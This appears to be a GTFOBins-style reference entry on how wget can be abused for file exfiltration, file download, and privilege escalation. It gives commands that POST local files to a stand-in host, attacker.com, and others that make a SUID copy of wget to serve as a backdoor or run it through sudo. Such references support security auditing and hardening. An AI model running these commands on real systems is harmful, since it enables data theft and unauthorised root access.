It can exfiltrate files on the network.
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use --post-data to send hard-coded data.
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-file=$LFILE $URLIt can download remote files.
Fetch a remote file via HTTP GET request.
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
wget $URL -O $LFILEIt runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p, omit the -p argument on systems
like Debian that allow the default sh shell to run with SUID privileges.
Fetch a remote file via HTTP GET request.
sudo sh -c 'cp $(which wget) .; chmod +s ./wget'
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
./wget $URL -O $LFILEIt runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
Fetch a remote file via HTTP GET request.
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
sudo -E wget $URL -O $LFILE